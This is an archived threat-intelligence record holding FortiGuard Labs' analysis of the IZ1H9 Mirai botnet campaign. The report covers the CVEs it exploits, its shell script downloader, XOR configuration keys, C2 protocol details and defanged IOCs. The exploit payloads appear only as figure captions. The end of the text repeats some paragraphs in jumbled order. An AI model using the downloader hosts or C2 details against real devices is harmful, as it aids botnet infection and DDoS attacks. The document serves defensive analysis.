{
	"id": "55212f59-6899-4485-ae4b-b835144a4c8f",
	"created_at": "2026-04-06T00:07:17.752797Z",
	"updated_at": "2026-04-10T13:12:22.603469Z",
	"deleted_at": null,
	"sha1_hash": "2375f902b5d1a682ff0686d2453ade0e99699037",
	"title": "IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2183055,
	"plain_text": "IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits |\r\nFortiGuard Labs\r\nBy Cara Lin\r\nPublished: 2023-10-09 · Archived: 2026-04-05 22:44:50 UTC\r\nAffected Platforms: Linux\r\nImpacted Users: Any organization\r\nImpact: Remote attackers gain control of the vulnerable systems\r\nSeverity Level: Critical\r\nIn September 2023, our FortiGuard Labs team observed that the IZ1H9 Mirai-based DDoS campaign has\r\naggressively updated its arsenal of exploits. Thirteen payloads were included in this variant, including D-Link\r\ndevices, Netis wireless router, Sunhillo SureLine, Geutebruck IP camera, Yealink Device Management, Zyxel\r\ndevices, TP-Link Archer, Korenix Jetwave, and TOTOLINK routers.\r\nBased on the trigger counts recorded by our IPS signatures, it is evident that peak exploitation occurred on\r\nSeptember 6, with trigger counts ranging from the thousands to even tens of thousands. This highlights the\r\ncampaign's capacity to infect vulnerable devices and dramatically expand its botnet through the swift utilization of\r\nrecently released exploit code, which encompasses numerous CVEs.\r\nIn this article, we will elaborate on how this threat leverages new vulnerabilities to control affected devices, along\r\nwith the details of IZ1H9.\r\nhttps://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nPage 1 of 16\n\nhttps://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nPage 2 of 16\n\nFigure 1: Telemetry\r\nExploit Payloads\r\nFour payloads, CVE-2015-1187, CVE-2016-20017, CVE-2020-25506, and CVE-2021-45382, target D-Link\r\nvulnerabilities. These critical-severity vulnerabilities can allow remote attackers to deliver command injection via\r\na crafted request.\r\nhttps://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nPage 3 of 16\n\nFigure 2: D-Link exploit payload\r\nhttps://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nPage 4 of 16\n\nAnother exploit, CVE-2019-19356, targets Netis WF2419. It focuses on exploiting a Remote Code Execution\r\n(RCE) vulnerability through the tracert diagnostic tool because of a lack of user input sanitizing. The payload\r\ninjects in parameter “tools_ip_url” and contains the “User-Agent: Dark” header used in the Dark.IoT Botnet.\r\nFigure 3: Netis WF2419 exploit payload\r\nThe campaign also seeks to exploit vulnerabilities discovered in 2021, including CVE-2021-36380, which affect\r\nSunhillo SureLine versions before 8.7.0.1.1, CVE-2021-33544/33548/33549/33550/33551/33552/33553/33554,\r\nwhich allow arbitrary command execution within the parameters of various pages on Geutebruck products, and\r\nCVE-2021-27561/27562, which affect Yealink Device Management (DM) 3.6.0.20.\r\nhttps://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nPage 5 of 16\n\nFigure 4: Sunhillo/Geutebruck/Yealink exploit payload\r\nThe next exploit targets the Zyxel device’s /bin/zhttpd/ component vulnerability. If insufficient input validation is\r\nfound, the attacker can exploit the vulnerability to launch a remote code execution attack on Zyxel\r\nEMG3525/VMG1312 before V5.50.\r\nFigure 5: Zyxel exploit payload\r\nThe threat actor has also incorporated vulnerabilities discovered in 2023 into their exploit payload list. CVE-2023-\r\n1389 specifically targets TP-Link Archer AX21 (AX1800), while CVE-2023-23295 impacts Korenix JetWave\r\nwireless AP.\r\nhttps://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nPage 6 of 16\n\nFigure 6: TP-Link/Korenix exploit payload\r\nCVE-2022-40475/25080/25079/25081/25082/25078/25084/25077/25076/38511/25075/25083 collectively\r\nrepresent a set of related vulnerabilities that focus on TOTOLINK routers.\r\nFigure 7: TOTOLINK exploit payload\r\nThe last one is an unclear exploit payload. It targets “/cgi-bin/login.cgi” and injects a payload in the “key”\r\nparameter. A similar vulnerability affects the Prolink PRC2402M router, but it is missing a few parameters to\r\nachieve remote code execution. It is unclear if the IZ1H9 campaign misused this payload or if they intended to\r\ntarget other devices.\r\nhttps://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nPage 7 of 16\n\nFigure 8: Exploit payload targets login.cgi\r\nShell Script Downloader\r\nThe injected payload in the above vulnerabilities intends to get a shell script downloader “l.sh” from\r\nhxxp://194[.]180[.]48[.]100. When the script is executed, it begins by deleting logs to conceal its actions. It then\r\ndownloads and executes various bot clients to cater to diverse Linux architectures. In the final step, the shell script\r\ndownloader obstructs network connections on multiple ports. This is achieved by altering the device's iptables\r\nrules, as illustrated in Figure 9.\r\nhttps://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nPage 8 of 16\n\nFigure 9: Shell script downloader \"l.sh\"\r\nMalware Analysis - IZ1H9\r\nIZ1H9, a Mirai variant, infects Linux-based networked devices, especially IoT devices, turning them into remote-controlled bots for large-scale network attacks. The XOR key to decode configuration is 0xBAADF00D, shown in\r\nFigure 10.\r\nFigure 10: Decoding configuration\r\nThe additional payload downloader URLs can be extracted from the decoded configuration in Figure 11, namely\r\nhxxp://2[.]56[.]59[.]215/i.sh and hxxp://212[.]192[.]241[.]72/lolol.sh. Both were employed in May 2023.\r\nhttps://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nPage 9 of 16\n\nFigure 11: Partial decoded configuration\r\nIZ1H9 also includes a data section with pre-set login credentials for brute-force attacks. The XOR decoding key is\r\n0x54, shown in Figure 12, and the decoded data is in Figure 13.\r\nhttps://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nPage 10 of 16\n\nFigure 12: XOR decoding for login credentials\r\nFigure 13: Decoded login credentials\r\nAs for the C2 communication, victims first send a check-in message with the parameter “l.expl” to the C2 server\r\n“194[.]180[.]48[.]101:5034,” and it responds with a keep-alive message “\\x00\\x00.” Once the compromised\r\ndevices receive a command from the C2 server, shown in Figure 14, they parse the packet to determine the DDoS\r\nattack method, target host, and packet count, if specified, before launching the attack. The message structure is as\r\nfollows:\r\n\\x00\\x28: Message packet length\r\n\\x0c: TCP SYN Attack\r\n\\x02: The following contains two options\r\n\\x08\\x12: Target + length\r\n\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f … \\x69\\x73: https://…is\r\n\\x18\\x04: Packet numbers + length\r\n\\x35\\x30\\x30\\x30: 5000 packets\r\nhttps://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nPage 11 of 16\n\nFigure 14: C2 communication\r\nhttps://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nPage 12 of 16\n\nFigure 15: TCP SYN flood attack\r\nhttps://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nPage 13 of 16\n\nFigure 16: DDoS attacking methods\r\nConclusion\r\nIoT devices have long been an attractive target for threat actors, with remote code execution attacks posing the\r\nmost common and concerning threats to both IoT devices and Linux servers. The exposure of vulnerable devices\r\ncan result in severe security risks. Despite the availability of patches for these vulnerabilities, the number of\r\nexploit triggers remains alarmingly high, often numbering in the thousands.\r\nWhat amplifies the impact of the IZ1H9 Campaign are the rapid updates to the vulnerabilities it exploits. Once an\r\nattacker gains control of a vulnerable device, they can incorporate these newly compromised devices into their\r\nhttps://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nPage 14 of 16\n\nbotnet, enabling them to launch further attacks like DDoS attacks and brute-force.\r\nTo counter this threat, it is strongly recommended that organizations promptly apply patches when available and\r\nalways change default login credentials for devices.\r\nFortinet Protections\r\nThe malware described in this report are detected and blocked by FortiGuard Antivirus as:\r\nBASH/Mirai.AEH!tr.dldr\r\nELF/Mirai.AT!tr\r\nELF/Mirai.GG!tr\r\nLinux/Mirai.L!tr\r\nLinux/Mirai.REAL!tr\r\nLinux/Mirai.IZ1H9!tr\r\nFortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard\r\nAntiVirus engine is a part of each of those solutions. As a result, customers who have these products with up-to-date protections are protected.\r\nFortinet has also released IPS signatures to proactively protect our customers from the threats contained in the\r\nexploit list.\r\nThe URLs are rated as “Malicious Websites” by the FortiGuard Web Filtering service.\r\nWe also suggest our readers go through the free NSE training: NSE 1 – Information Security Awareness, a module\r\non Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks.\r\nFortiGuard IP Reputation and Anti-Botnet Security Service proactively block these attacks by aggregating\r\nmalicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative\r\ncompetitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile\r\nsources.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, please contact our Global\r\nFortiGuard Incident Response Team.\r\nIOCs\r\nURLs:\r\n194[.]180[.]48[.]100\r\n2[.]56[.]59[.]215\r\n212[.]192[.]241[.]72\r\nFiles:\r\nhttps://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nPage 15 of 16\n\nc8cf29e56760c50fa815a0c1c14c17641f01b9c6a4aed3e0517e2ca722238f63\r\n1e15d7cd0b4682a86620b3046548bdf3f39c969324a85755216c2a526d784c0d\r\n7b9dce89619c16ac7d2e128749ad92444fe33654792a8b9ed2a3bce1fee82e6a\r\nb5daf57827ced323a39261a7e19f5551071b5095f0973f1397d5e4c2fcc39930\r\nb523ea86ebfd666153078593476ca9bd069d6f37fa7846af9e53b1e01c977a17\r\n8d07f15dd7d055b16d50cb271995b768fdd3ca6be121f6a35b61b917dfa33938\r\n34628bcfc40218095c65678b52ce13cea4904ce966d0fd47e691c3cb039871ec\r\nafc176f7b692a5ff93c7c66eee4941acf1b886ee9f4c070faf043b16f7e65c11\r\ndf9ee47c783fbe8c3301ed519033fc92b05d7fd272d35c64b424a7e46c6da43b\r\n737ba9e84b5166134d491193be3305afa273733c35c028114d8b1f092940b9a3\r\n0aa9836174f231074d4d55c819f6f1570a24bc3ed4d9dd5667a04664acb57147\r\nSource: https://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nhttps://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nPage 16 of 16\n\nFigure 10: Decoding The additional configuration payload downloader URLs can be extracted from the decoded configuration in Figure 11, namely\nhxxp://2[.]56[.]59[.]215/i.sh and hxxp://212[.]192[.]241[.]72/lolol.sh.  Both were employed in May 2023.\n  Page 9 of 16  \n\nFigure 11: Partial IZ1H9 also includes decoded configuration a data section with pre-set login credentials for brute-force attacks. The XOR decoding key is\n0x54, shown in Figure 12, and the decoded data is in Figure 13.\n   Page 10 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits"
	],
	"report_names": [
		"Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits"
	],
	"threat_actors": [],
	"ts_created_at": 1775434037,
	"ts_updated_at": 1775826742,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2375f902b5d1a682ff0686d2453ade0e99699037.pdf",
		"text": "https://archive.orkl.eu/2375f902b5d1a682ff0686d2453ade0e99699037.txt",
		"img": "https://archive.orkl.eu/2375f902b5d1a682ff0686d2453ade0e99699037.jpg"
	}
}